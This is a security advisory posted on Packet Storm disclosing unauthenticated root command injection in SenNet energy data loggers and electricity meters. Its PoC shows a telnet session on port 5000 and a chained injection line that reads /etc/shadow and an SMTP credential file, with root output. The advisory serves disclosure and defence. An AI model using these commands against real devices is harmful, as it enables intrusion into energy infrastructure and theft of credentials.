what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

SenNet Data Logger / Electricity Meter Code Execution

SenNet Data Logger / Electricity Meter Code Execution
Posted Apr 6, 2017
Authored by Karn Ganeshen

SenNet data logger and electricity meter appliances suffer from insecure configuration and OS command injection vulnerabilities.

tags | exploit, vulnerability
SHA-256 | af974497ffb69114fb44715f152d81b4463d76f11a1ae74ed3a4e791dae40a58

SenNet Data Logger / Electricity Meter Code Execution

Change Mirror Download
SenNet Data Logger appliances and Electricity Meters Multiple
Vulnerabilities

Note: Vendor has released the fix. Details to be documented in ICS-CERT
Advisory.

About
SenNet is a trademark of Satel Spain that offers monitoring and
remote-control solutions for businesses. Our engineers develop, integrate
and test the products of SenNet in our facilities in Madrid (Spain).

http://www.sennetmonitoring.com/wp-content/uploads/2016/05/Datasheet_owa31I-.pdf

Vulnerable products

SenNet Optimal DataLogger appliance
SenNet Solar DataLogger appliance
SenNet Multitask Meter

Deployment Geography
Americas and Europe regions

Target Audience / Industry
Energy, Power, Service Providers, Telecom

Note: all appliances seem to be running on the same code base, and
therefore, all SenNet models, and software versions stand vulnerable.

Appliances Confirmed affected:

SenNet Solar
Datalogger Model: OWA3X
Serial Number: A04WCJ
Licence type: A02
Version: V5.03-1.56a

SenNet Optimal
Datalogger Model: OWA31
Serial Number: A05B89
License type: A02
Version: V5.37c-1.43c

SenNet Multitask Meter
Datalogger Model: OWA3X
Serial Number: A04ZZ3
Licence type: A02
Version: V5.21a-1.18b

SenNet Optimal is a monitoring solution to meter consumption (electricity,
gas, water) and other variables (temperature, humidity, presence, lighting
a|); both for industries and for businesses in the tertiary sector.

http://www.sennetmonitoring.com/en/sennet-optimal-2/

SenNet Solar is a solution for monitoring. It is suitable for any kind of
power generation plants. In this type of facilities, it is essential to
monitor and remotely control the devices involved in the process:
inverters, meters, trackers, etc.

http://www.sennetmonitoring.com/en/sennet-solar/

SenNet Meter is an ideal device for electricity submetering.
http://www.sennetmonitoring.com/en/electricity-meters/

Vulnerability Details

1. No access control on the remote shell
The appliance runs ARM as underlying OS. Telnet access is enabled on TCP
port 5000. There is no authentication required for accessing and connecting
the remote shell. Any user can connect to the shell and issue commands.

2. Shell services running with excessive privileges (superuser)
The service runs with superuser root privileges, thus giving privileged
access to any user, without any authentication (exploited via OS Command
Injection described nexe).

3. OS Command Injection
The remote shell (attempts to) offer a restricted environment, and does not
allow executing system commands. However, it is possible to break out of
this jailed shell by chaining specific shell meta-characters and OS
commands.

The service / application is run as 'root' and OS command injection results
in full system access.

Apart from energy logging data, the device stores sensitive information
such FTP, SMTP and other service login credentials, used by the application
for functions, as well as to connect with other external, public facing
servers.

PoC:

# telnet IP 5000 2>/dev/null
Trying IP...
Connected to IP.
Escape character is '^A'.
$ true; id; pwd; cat /etc/shadow; ps; cat /home/etc/ssmtp/ssmtp.conf;
/bin/sh: $: not found
uid=0(root) gid=0(root)
/home
root:$1$<removed-for-report>:13852:0:99999:7:::
nobody:*:13852:0:99999:7:::
nfsnobody:!!:13852:0:99999:7:::
PID USER VSZ STAT COMMAND
1 root 2412 S init
2 root 0 SW AkthreaddA
3 root 0 SW Aksoftirqd/0A
<snip>
root=postmaster
mailhub=<removed>:25
rewriteDomain=example.com
hostname=_HOSTNAME_
<snip>

4. Insecure Transport - all communications are clear-text, and prone to
sniffing.

+++++
Metasploit module will be released shortly.
+++++


Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close